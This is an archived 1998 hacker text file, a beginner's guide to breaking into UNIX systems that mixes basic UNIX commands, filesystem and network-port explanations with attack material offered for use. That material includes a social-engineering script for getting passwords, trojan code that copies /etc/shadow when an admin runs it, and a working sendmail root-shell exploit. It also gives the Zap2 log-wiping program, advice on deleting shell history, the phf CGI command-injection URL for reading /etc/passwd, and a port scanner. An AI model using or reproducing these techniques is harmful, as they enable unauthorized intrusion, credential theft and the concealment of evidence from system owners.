Hackers Handbook - Millenium Edition

home *** CD-ROM | disk | FTP | other *** search

/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack / unix_intro1.txt < prev next >

Wrap

Text File | 1998-07-23 | 41.6 KB | 925 lines

An Introduction To Hacking Around With The UNIX Operating System By Netdiablo of 616 <ndiablo@complink.net> It is surprising that the majority of "hackers" today have little or no knowledge of the systems they are trying to penetrate. They are the ones looked down upon by the more experienced, those who run exploits to get access and then have no idea what to do once they have the access anyway. This textfile aims to give the newbie, or perhaps even intermediate user some information on the UNIX system, and how to hack around with it. Note that this file does not purport to be the be-all and end-all to UNIX, even for a beginner textfile. I have seen textfiles on UNIX that number 50+ pages and still not get the idea across. People have built entire careers on UNIX security, and obviously it couldnt even all be explained in an entire set of texts. Mastery requires not only reading and learning, but real-life experience that comes with time. Beginning with the basics, UNIX is a multi-user, multitasking operating system that originated at Bell Labs in the late 1960's. It was created by engineers that had previously been working on the Multics project, which was a multitasking, multi-user OS as well, that introduced many of the security concepts in use today in government certified B2 and B3 level systems. A small bit of trivia, UNIX was initially started on old GE mainframes, but quickly moved to DEC PDP series minicomputers. From there, it was ported to numerous other minicomputers and mainframes, and improved over the years to the UNIX we know today. UNIX takes many forms, but can be grouped into two major categories. There are BSD-derived UNIX systems, and System V based systems. The BSD standard originated at the University of California-Berkeley and was considered by many to be superior to AT&T offerings at the time. Many older UNIX systems were based on it, such as SunOS, and many are based on it now, such as OpenBSD, NetBSD, and FreeBSD. Other systems have integrated BSD features into System V, such as Xenix. System V is the current AT&T standard for UNIX. It really became popular when the University of California-Berkeley announced that it would no longer be developing BSD. Since then, the rights to "real" BSD have gone to BSDI, Inc. So, you might be asking, what the hell does this have to do with hacking? Nothing. It's simply background, and it's good to know the difference between System V and BSD anyway. This file really does two things - it alternates between giving information on UNIX security, and giving information on UNIX usage. When you first access a UNIX system, it will probably be by a protocol called telnet. When you telnet into a UNIX system, you should be able to notice it by some very standard things about UNIX. A login prompt usually looks like: <System_Type/Version> (system.name.com) (ttyXX) login: At the least, you will see "login:", and that pretty much means you've got a UNIX system on your hands. Sometimes, the system name and terminal will be in different positions, or not printed at all. At this prompt, you will be expected to login using a valid username. On UNIX systems, usernames are by standard 8 characters in length, although that can be extended by the use of special software, although it is uncommon. Then, you will be prompted for a password, which is also by standard 8 characters, but can be also lengthened by use of special software. The UNIX system has several accounts that are installed default onto it so that essential system services may be run. These typically include: root: The system administrators account bin: Owner of system binaries [most default executables on the system] daemon: Owner of system daemons [programs that run specific services on ports] adm: Another seldom-used administration account lp: Owner of printers sync: Seldom-used account for synching disks shutdown: Seldom-used account for system shutdown halt: Seldom-used account for halting system mail: Owner of some system mail-related files news: Owner of netnews-related files uucp: Owner of UUCP binaries, which are, at this time, generally obsolete operator: Another seldom-used administration account postmaster: An account that gets misrouted mail and other junk, usually alised to root. Although earlier files you might have seen say otherwise, I have found that all the accounts listed above are always locked out [disabled] EXCEPT for root. That means that accounts like bin,daemon, adm, lp, and the rest are useless for login. Root should have a VERY strong password if the admin is more intelligent than a gorilla. If you really want to try hacking defaults, though, try using the account name as the password, and also try words that have a relation to the account. For instance, for an administrative account like 'root' you could try passwords like 'admin' or 'sysadmin' or 'manager'. You might then be wondering how would one go about getting access on a UNIX system. There are two major ways of doing this that will be covered in this file. The first is stealing/guessing/cracking passwords, the most traditional approach, and then there are buffer overflows. A buffer overflow is an exploit that consists of overflowing [usually] an input buffer in a program. When that is done properly, the program will crash, sometimes leaving you with a shell! If that program happened to be SUID root, then, you just got root! ------------------------------------------------------------------------------ New user definition [SUID]: Set User ID. This is a parameter set on a program that makes it execute as if it had privelages of the user it is SUID to. Sometimes this is used with the root account to allow a program to access certain files that it might need that are privelaged, for instance, /etc/shadow. ------------------------------------------------------------------------------ The first method, the stealing/guessing/cracking/etc. of passwords is the most traditional method of getting access to a box. This can be quite simple, such as social engineering some idiot who has an account on the box and getting them to give you their username and password, or it can be somewhat complex, like unshadowing the password file, then running a cracker on it. ------------------------------------------------------------------------------- New user definition [Social Engineering]: Tricking a computer-illiterate idiot into giving you useful information that will help you better exploit your target system. ------------------------------------------------------------------------------- One can also guess a password on a system. Possible passwords might be the users name, the users name backwards, the users birthdate or phone number, name of a friend or relative, name of the system, or a word that has a relation to their job or profession. Social engineering a password can be quite easy or really hard depending on how stupid and gullible the target is. Obviously, there is a cutoff for this sort of attack - experienced users will know you are just bullshitting them. This can be done over the phone, electronically through chat or mail, or in many other ways! IDIOT: Hello YOU: Hi, i'm with systems administration, and we're planning on moving some of the user home directories onto a larger disk later today. This won't be an inconvenience to you? IDIOT: No, i'll be finished with the system by then. YOU: Ok, we'd like your password so that we can check and see that all your files transferred ok. Your login is "idiot", right? IDIOT: Thats right. My password is "toidi" YOU: Thank-you. I'll be sure to check and see that everything works all right after the move. IDIOT: Thanks Of course, it is always better to sound as proficient as possible, especially if the user is very computer illiterate and will be intimidated by the fact that you will sound knowledgable. However, if you bullshit your way through with someone who knows what they are doing, you can easily become screwed! Also, you can steal the systems password file. This can be done remotely, although it is a bit harder now than it used to be. Exploits can be found in older versions of Sendmail that will make it mail the password file to you, and the password file can also be grabbed by FTP if the admin put the real password file there, although take note that usually one will find a small, crippled password file in its place. You can also quickly steal the password file if you can find a system running a protocol like TFTP, which you will probably never find at this point in time, or other services, like NFS, can also be manipulated to get access to files remotely. If you already have an account on the system, it is VERY easy. Simply copy the password file to your directory, and FTP it off of the system. This can be done using the following command: cp /etc/passwd /your/home/directory/passwd or, you could also use a command like: cat /etc/passwd > /your/home/directory/passwd Then, just FTP it off the system onto your local box, where you can run a password cracker, like Crack on it. At this point in time, you might run into another problem. The password file might be "shadowed". Shadowing is a scheme which attempts to make the password file a lot harder to steal and crack. In the shadowing scheme, all the users usual information EXCEPT the password is stored in /etc/passwd, but the users password is stored in a special file that only root has privelages to called the shadow file. There are many variations in what the shadow file is called on different operating systems, but it is usually /etc/shadow on System V derived systems, or /etc/master.passwd on BSD derived systems. You can tell if you have a passwd file that is "shadowed" by the fact that all the entries in the passwd file contain some sort of token, and not the real passwords. Most common are "x", "*", and "!". -------------------------------------------------------------------------- Also, for your information, here is a look at the structure of an entry in the passwd file: Username:Encrypted Password:UID:GID:GECOS:Home Directory:Shell It is pretty obvious what the 'Username' and 'Encrypted Password' fields contain. The UID and GID fields contain the numeric UserID and GroupID of the account. The GECOS field contains information like the users real name, phone number, office, and other information which is shown when you perform a 'finger' query on the user. The 'Home Directory' and 'Shell' fields are self explanatory as well. -------------------------------------------------------------------------- Therefore, for all practical reasons,it seems that you have to have root before you can steal the password file and get actual passwords, but this is not totally so. There are a few ways around this. First of all, you can trick the admin into running an application or a script that is in reality a trojan horse to steal the passwd and shadow files! Below is an example of a script that will do this: echo "Initializing player information..." cp /etc/shadow /my/home/directory/.shadow cp /etc/passwd /my/home/directory/.passwd chmod 777 /my/home/directory/.shadow chmod 777 /my/home/directory/.passwd echo "Segmentation fault (core dumped)" touch core This is a decent script, although not really convincing. A better way to do this would be to include something like the following in a small C program and get the admin to run this: if (getuid()==0) { system("cp /etc/shadow /my/home/directory/.shadow"); system("cp /etc/passwd /my/home/directory/.passwd"); system("chmod 777 /my/home/directory/.passwd"); system("chmod 777 /my/home/directory/.shadow"); } else do_other_program_stuff(); This will use the "getuid" function to get the user's UID, and if the UID is 0 (the root UID) then it attempts to steal the password file. However, if the admin is being secure, and not running it from the root account, the program will not do anything. This will make it more convincing than if the admin ran the script under a non-root account and got errors about not having permissions to /etc/shadow! ----------------------------------------------------------------------------- New User Definition [UID]: The numerical User ID of a user on a UNIX system. Each login has a UID that corresponds to it. ----------------------------------------------------------------------------- You can also use an exploit to attempt to steal parts [or all] or the shadow file through coredumps. This exploit is available from the rootshell website under the filename "imapd_core.txt", "telnet_core.txt", and others. ----------------------------------------------------------------------------- New User Definition [Rootshell]: Rootshell.com, one of the best sites on the web for getting exploit code and information. Available at the rootshell website at http://www.rootshell.com New User Definition [Coredump]: A "core" file is a file that contains the contents of program's memory space at the time that a program crashed. Used under normal circumstances as a debugging aid, it can also be used to steal data by crashing programs and reading the information out of the corefile. ----------------------------------------------------------------------------- Here is an example of such an exploit, the "imapd_core" exploit from rootshell: When fed an unknown username, imapd and ipop3d will dump core: [root@koek] /# telnet zopie 110 Trying 10.10.13.1... Connected to zopie.attic.vuurwerk.nl. Escape character is '^]'. +OK zopie.attic.vuurwerk.nl POP3 3.3(20) w/IMAP2 client (Comments to MRC@CAC.Wa shington.EDU) at Sun, 1 Feb 1998 23:45:06 +0100 (CET) user root +OK User name accepted, password please pass linux [this is not the correct password] -ERR Bad login user john [i have no user named john] +OK User name accepted, password please pass doe Connection closed by foreign host. At this point, ipop3d coredumps in /core: [root@zopie] /# strings core | grep -A3 root root [encrypted pw here] 10244 Sun Feb 1 23:45:15 1998 -- root:[crypted pw here]:10244:0::::: halt:*:9797:0::::: operator:*:9797:0::::: shutdown:*:9797:0::::: [looks like my /etc/shadow] -- ------------------------------------------------------------------------------ New User Definition [Disabled Account]: An account can be disabled on a UNIX system by replacing its password in the /etc/passwd OR /etc/shadow files with a token, which is usually "*". If password shadowing is in use, this will be in the /etc/shadow file, if not, this will be in the /etc/passwd file. Do not confuse this with shadowing, because in shadowing, all the passwords in the /etc/passwd file will be marked with a token (usually "x" or "*") and you will have to see the /etc/shadow file to see if they are really disabled. ------------------------------------------------------------------------------ Now, lets assume that you have a password and/or shadow file. Now, you will have to crack it. First of all, look for password or shadow files that have users with no password. This can be told by the blank space in the password field. Then, if you have a shadow file, copy the actual passwords into the password file and replace the tokens. Now you will have a password file ready to crack. You can crack password files with several popular programs, some of which are available on the rootshell website. Some of there programs are "Crack", which is available for UNIX platforms, and at this time, is at version 5.0. A password cracker called "John The Ripper" is a popular one for DOS and Windows boxes. If the cracker comes up with any passwords, then you just got a few new accounts on the box, and if you come up with a root password, then congratulations, you just own the box. Onto the other method, which is the buffer overflow method. Buffer overflows are commonly done with exploit programs. Buffer overflows take advantage of poorly written SUID programs. When a buffer overflow is used on a SUID root program, the program may crash, and in circumstances, leave you with a privelaged shell. An example of a buffer overflow exploit for an old version of Sendmail is shown below: #/bin/sh # # # Hi ! # This is exploit for sendmail smtpd bug # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms). # This shell script does a root shell in /tmp directory. # If you have any problems with it, drop me a letter. # Have fun ! # # # ---------------------- # --------------------------------------------- # ----------------- Dedicated to my beautiful lady ------------------ # --------------------------------------------- # ---------------------- # # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su # # # echo 'main() '>>leshka.c echo '{ '>>leshka.c echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c echo '} '>>leshka.c # # echo 'main() '>>smtpd.c echo '{ '>>smtpd.c echo ' setuid(0); setgid(0); '>>smtpd.c echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c echo '} '>>smtpd.c # # cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c ./leshka kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n" |head -n 1` rm leshka.c leshka smtpd.c /tmp/smtpd echo "Now type: /tmp/sh" This exploit is a shell script that echoes some C code into two C files, and the compiles and runs them, with the result of giving a root shell on systems running a vulnerable version of sendmail. There is not much else to say about buffer exploits - they are quickly used to get access on a system. The question now is what to do once you have broken into a system. Once you have broken a system, you can use it as a base of attack against other systems, steal files, and other things. If you have taken root, consider the system your own - you can do whatever you please - add users, delete and add files, make the system wide open or lock it down. I assume you've read all the stuff out there on ethics - i'm not gonna say much here but if you break a system, dont be an ass and do things like removing legitimate users, deleting the files of legitimate users, crashing the system, or other things that make true hell for the real day-to-day users of the system. The remainder of this file will feature commands and strategies for moving around inside UNIX systems. Once you have gotten into a UNIX system, you will be logged in, and your shell will start. There are many shells, but the most numerous of them are the Bourne shell [sh or bash], the C shell [csh], the Korn shell [ksh], and the Z shell [zsh]. Depending on the system, you will also see the date of the last login on the account, and the destination from where it occured. This is important. If you want to prolong your stay on a system, you must be careful to call as little attention to yourself as possible. That means WATCH YOUR LOGS. If you have a regular user account, there is not much you can do but try and stay out of the logs as much as possible, but if you have root, you can remove your presence entirely! There are many programs that relieve you from doing this task by hand; a good one is called Zap2, which is listed below. #include <sys/types.h> #include <stdio.h> #include <unistd.h> #include <sys/file.h> #include <fcntl.h> #include <utmp.h> #include <pwd.h> #include <lastlog.h> #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); } Using this program, you can make yourself nearly invisible on a machine. Remember, edit the logs - dont delete them. Deleting or completely destroying log files is sure to trigger the administrators suspicions. Also, you must keep track of your history files. These contain every command you have entered while your were logged in, and can be dangerous evidence if you are caught. Be sure to look for files like ".history" and ".bash_history" in the home directory of the account you are using and delete them! So, now that you have access, you will need to know the commands UNIX uses to get around. You might be familiar with them, as Microsoft ripped off some of the UNIX command names in DOS. (Note that UNIX commands are case sensitive) UNIX Command DOS Equivelant Function ls DIR List files in directory ls -l DIR /W List files in directory [long] ls -a DIR /AH List files in directory [all] cd CD Change directory rm DEL Delete file cp COPY Copy file mv MOVE Move file ln N/A Create "link" to a file [similar to "shortcuts" in W95] ps N/A Show processes running [you] ps -uax N/A Show processes running [with extra info, all users] w N/A Show users logged in logout N/A Logout of system chmod ATTRIB Change file attributes chown N/A Change file ownership man HELP Help on commands [syntax, etc] gcc N/A Compile C files cc N/A Compile C files netstat N/A Show network information [open connections, etc] ifconfig N/A Show information on network interfaces [e.g. ethernet cards, ppp links] du CHKDSK Show disk usage Obviously, the UNIX command structure is a lot more broad and powerful than that of DOS. There are hundreds of UNIX commands, with only the common ones listed above. Now to some more information on the UNIX filesystem. The UNIX filesystem is also very powerful and advanced. It allows filenames with names up to 255 characters in some implementations, and you are not restricted by having to have a three character extention on the end. That is where filenames like "ssh-1.2.22.tar.gz" come in (heh). The UNIX directory system uses the "/" character to seperate directories, unlike DOS, which uses a "\", and, unlike DOS, UNIX does not use "drive letters". In UNIX, disks are mounted under directories. For instance, one might have two drives. In DOS, they might be called C: and D:, but in UNIX, they might be mounted under the "/" directory and the "/usr" directory. ----------------------------------------------------------------------------- New User Definition [/]: The root directory in UNIX. All other directories are mounted from here. If this confuses you, think of "/" as "C:\". ----------------------------------------------------------------------------- The UNIX filesystem also follows, to a certain extent, a standard format. This is illustrated below in a diagram: / /bin /usr /var /etc /dev /lost+found /proc /mnt /sbin /tmp /home What is in these directories? /bin: Contains necessary system binaries, such as ls, rm, etc. /etc: Contains all system configuration information. /dev: Contains system device files. /var: Contains logfiles, mail and news spool directories, etc. /home: Contains user home directories [sometimes these are in /usr] /usr: Contains most system executables and files. Binaries in /usr/bin, C compiler include files in /usr/include, Manual pages in /usr/man, shared libraries in /usr/lib [sometimes this is in /lib]. /lost+found: Contains inodes that may have become corrupted in system crashes. /mnt: Removable drives are sometimes mounted here, such as floppies, etc. /tmp: Directory where temporary files are stored. Contents of this directory are usually deleted everytime the system starts up or reboots. /proc: This is a "virtual filesystem" that contains information on all the processes that are currently running on the system at the time. /sbin: This is mostly where files used for system diagnostics and administration are stored. Sometimes, system daemons are stored here, also, instead of in /usr/sbin. The UNIX filesystem also has a set of bits that set attributes about a file. Wheras DOS has perhaps three or four attribute bits, UNIX has many more. They are given in a format as follows: The UNIX attribute bit system has four positions: - --- --- --- 1 2 3 4 The first position is simply a bit that indicates if the file is "special". A file can be "special" in a number of ways. There are four bits that can be set in the first position. They are: d: File is a directory. l: File is a link. c: File is a character device. b: File is a block device. A file that just has "-" in the first position is simply a regular data or executable file. The second position is a set of three bits that indicates what privelages the owner has in regard to the file. Each bit has one setting, and they are as follows: r: User has "read" permission to file. w: User has "write" permission to file. x: User has "execute" permission to file. s: The SUID bit (see below). There is also a fourth bit, the SUID bit. This will take the place of the "x" bit, so if you see a file with permissions like "rwsr-xr-x", you know it is SUID. The third position is what privelages the members of the group that owns the file has in regard to the file. It also has three bits with one setting, and they are the same as above - read, write, and execute. The fourth and final position is what privelages "other users" have in regard to the file. "Other users" consists of any user that does not own the file or that is not in the group that owns the file. It also contains three bits with one setting each, and they are the same as above also - read, write, and execute. Given below are some examples of a "ls -l" directory listing that show the ownership and permissions on the file. -r-------- 1 root root 715 Jun 14 16:16 /etc/shadow Here, the file "/etc/shadow" is owned by the root user and the root group, and can only be read by the root user. Any other person on the system cannot read, write to, or execute [run] the file. lrwxrwxrwx 1 root root 8 Aug 28 1997 /tmp -> /var/tmp Here, the file "/tmp" is a link to the directory "/var/tmp". It is owned by the root user and the root group, and is readable, writable, and executable by any user on the system. drwxr-xr-x 8 root root 1024 Jun 18 14:15 mothra Here is a directory, owned by user root and group root. The user root can read, write to, and execute the directory. The other members of the root group can read the directory and execute it, but not write to it. Other users on the system who are not members of the root group or the user root can also read and execute the directory, but not write to it. -rw-r--r-- 1 ndiablo ndiablo 240 Apr 16 10:32 rksh.c This file is a regular file, owned by the user ndiablo and the group ndiablo. The usr ndiablo can read and write to the file, but not execute it (since it is a textfile, not a program). Other users who are in the ndiablo group can only read the file, and users on the system who are not ndiablo or in the ndiablo group can also only read the file. To put this simply, here is one more diagram: drwxrwxrwx |\ /\ /\ / | | | | | | | | "Special" Bit | | | | | | Privelages For | Privelages for Owner | "Everyone Else" | Privelages For Owning Group Members Now that you know the rudimentary UNIX commands, and important information about the UNIX filesystem, one final thing the beginner should know about UNIX is some beginner information on it's networking commands. Obviously, you should find a good tutorial textfile on the Internet and TCP/IP if you are a little unclear on the workings on the Internet. UNIX has many networking commands - UNIX and the Internet go hand in hand, partially because UNIX is one of the most network-integrated operating systems there is. Obviously, if you are any sort of UNIX user, you need to know how to use the power of UNIX on the network. The UNIX network services will be explained on a protocol-to-protocol basis, covering the major ones. Port 11: Systat If you telnet to port 11 on a machine, you might get lucky and have the "who" or "ps" command printed out to you. An admin is a total security fool if he runs this, and is just giving out information that is at the least background on hacking the machine, and you can often find valid account names or find out what programs are being run on the system through this. Port 15: Netstat If you telnet to port 15 on a machine, you might also get lucky and have the "netstat" command printed out to you. Also, an admin would be a total moron to run this service, and it gives you more security background on the machine. Through netstat, you can get an idea of which services the machine serves, and what systems the machine's users login from. Port 21: FTP FTP is the Internet File Transfer Protocol. UNIX runs a FTP daemon [server] on port 21, which is usually wuftpd or the BSD FTP daemon at this point in time. UNIX also has a FTP client, which can be accessed by typing "ftp" at your shell prompt. The syntax for FTP, plus some useful commands are as follows: At the shell prompt: ftp <ftp.host.com> \ >-- To connect to a system At the "ftp>" prompt: open <ftp.host.com> / Once you are connected and have logged in, you can use the "cd" command to change directories, the "ls" command to list files, the "get" command to get files, and the "send" command to send files. Typing "help" will give more help on the FTP client program. You can disconnect by typing "bye" or "quit" at the FTP prompt. Port 22: SSH [Not standard, but common] SSH is the port that the Secure Shell is usually installed on. Secure shell is a very kewl program that resembles rlogin, but encrypts the session, which protects against packet sniffing attacks. If the machine you are on has it installed, you can open a secure shell session to a host using the "ssh" command. For information on how to use the "ssh" command, just type "ssh" at your prompt, and it will list all the options for its usage. Normally, you would use a command like "ssh -l username hostname.com". Port 23: Telnet Telnet is the protocol which allows you to remotely login to machines over the internet and establish a terminal session. The telnet daemon is pretty standard. You can access the telnet client program by typing "telnet" at your prompt. It's syntax is really, for most practical purposes, as follows: At the shell prompt: telnet <host.com> [port number] The port number is optional, and specifies what port on the machine to connect to. An example of this is "telnet anubis-gw.dyn.ml.org 25". You can exit a telnet session by logging out of the machine, or by typing the "escape character", which is usually ^], and typing "quit" at the "telnet>" prompt. Port 25: Sendmail This is the default port for the system mailer, which is MOSTLY sendmail, but sometimes could be a variant, like qmail, or perhaps a wrapper program, one example of which is smap from TIS. You normally interface with Sendmail through the "mail" program. It's syntax is very broad, but usually is something like the following for most puropses: At the shell prompt: mail user@host.com I have the problem that there are lots of quirks to Sendmail that could help you get access, but as i'd like to keep this file broad, you'll have to look for specific information on Sendmail in another textfile. Port 53: BIND (DNS) This is the domain name server port. The only boxes that should be running this are a domain's nameservers [obviously]. There are a few exploits, some of which have come out pretty recently at the time of this writing, that will help you exploit the BIND daemon to get a shell on a remote system. Again, I havent really played around with BIND a whole lot, so if you want more information on the topic, i'll leave it up to you to find a textfile that is more specific on the topic. Port 69: TFTP This is the Trivial FTP Protocol. If you ever find a host running this, quickly connect and steal the /etc/passwd file. UNIX has a TFTP client, type "tftp" at your shell prompt and, from that, type "help", or "?" at your "tftp" prompt for more information. I am not going into much depth here because it is a seldom-used protocol. Port 79: Finger Finger is a protocol that can give you information on users. You can also create DoS attacks using a technique called "redirecting" if the daemon supports it. This one is really a mixed bag. For the most part, it doesnt offer specific security vulnerabilities (although there are exceptions) execpt providing information that could help you social engineer people. Smart system admins often turn this one off, but you may find it running on large computers, or often, ISPs. You can perform a finger query by typing: At the shell prompt: finger user@host.com Port 80: HTML This is the port that HTML is served through. Even the most computer illiterate idiots will know about this one. There are lotsa clients to interface with the World Wide Web, a good one for the console [non-graphical] is lynx. Its syntax as is follows: At the shell prompt: lynx http://www.host.com HTML by itself doesnt offer any security vulnerabilities, but CGI really does. If the admin is a moron, he still might be vulnerable to the "phf" CGI hole, although at this point in time, its so old its doubtful. Just in case, though, here is information on the "phf" hole: You can connect to a site, and use the "phf" CGI program to execute commands on the remote system. To do this, open up your web browser and type this URL: http://host.com/cgi-bin/phf/?Qalias=x%0acommand The "command" is the command string. It follows directly after the "=x%0a" stuff. For instance, if i wanted to know the UID that the HTTP daemon was running under, i would enter: http://host.com/cgi-bin/phf/?Qalias=x%0aid \ /\/ \ / <-- The command to execute \ The URL for exploiting the hole / Or, if i wanted to type the /etc/passwd file, i would enter: http://host.com/cgi-bin/phf/?Qalias=X%0a/bin/cat%20/etc/passwd You may also be able to find other holes, major or minor in system CGI programs. IRIX machines seem to have a particular problem with this sort of thing. Port 110: POP3 POP3 is the Post Office Protocol, Version 3. As shown earlier in this file, you can exploit certain versions of the POP3 daemon. This daemon is not usually running on a computer unless the computer is a mailserver. You can interface with POP using a UNIX program such as Fetchmail. As this is usually not a standard thing, i'll leave it to you to read the documentation to Fetchmail. Port 111: Sun RPC Portmapper This is the RPC portmapper, which is the daemon that maps port numbers to other Sun RPC services. There are also some exploits that will allow you to fuck with the RPC portmapper, although I want to keep this file to the basics, so i'll leave it to you to look around for more information. Port 119: NNTP This is where the Netnews daemon is. If you know what you're doing, you can spoof netnews from this port. As I dont fuck with Netnews on the whole that much, i'll leave it to you to find out how to fuck with NNTP. You might be wondering if there is an easy way to find which ports are open on a machine. Indeed, there is. Here is a useful program called TCPProbe: /* -*-C-*- tcpprobe.c */ /* tcpprobe - report on which tcp ports accept connections */ /* IO ERROR, error@axs.net, Sep 15, 1995 */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <errno.h> #include <netdb.h> #include <signal.h> int main(int argc, char **argv) { int probeport = 0; struct hostent *host; int err, i, net; struct sockaddr_in sa; if (argc != 2) { printf("Usage: %s hostname\n", argv[0]); exit(1); } for (i = 1; i < 1024; i++) { strncpy((char *)&sa, "", sizeof sa); sa.sin_family = AF_INET; if (isdigit(*argv[1])) sa.sin_addr.s_addr = inet_addr(argv[1]); else if ((host = gethostbyname(argv[1])) != 0) strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr); else { herror(argv[1]); exit(2); } sa.sin_family = AF_INET; if (isdigit(*argv[1])) sa.sin_addr.s_addr = inet_addr(argv[1]); else if ((host = gethostbyname(argv[1])) != 0) strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr); else { herror(argv[1]); exit(2); } sa.sin_port = htons(i); net = socket(AF_INET, SOCK_STREAM, 0); if (net < 0) { perror("\nsocket"); exit(2); } err = connect(net, (struct sockaddr *) &sa, sizeof sa); if (err < 0) { printf("%s %-5d %s\r", argv[1], i, strerror(errno)); fflush(stdout); } else { printf("%s %-5d accepted. \n", argv[1], i); if (shutdown(net, 2) < 0) { perror("\nshutdown"); exit(2); } } close(net); } printf(" \r"); fflush(stdout); return (0); } This program will scan a machine's ports and report any that are open. It works quite well, and will run quickly even on a slow PPP or SLIP link. Now you have covered the basics of getting around in UNIX, and also the basics of getting access on the UNIX system. If you had noticed, this didnt offer much ready-to-do stuff, although it did point to where it could be found or learned. That is the whole point of hacking - don't do it cookie-cutter, that isnt real hacking. The whole idea is to learn. Presented below are some hacking resources and contact information. The RootShell Archive - http://www.rootshell.com Bugtraq Mailing List Archives - http://www.geek-girl.com/bugtraq Phrack, Inc. - http://www.phrack.com HackerZ Hideout - http://www.hackersclub.com/km DIABLO-NET Security Archives ftp://anubis-gw.dyn.ml.org/pub/Computer-Security $ by Netdiablo <ndiablo@complink.net> <root@anubis-gw.dyn.ml.org> 6/19/98 $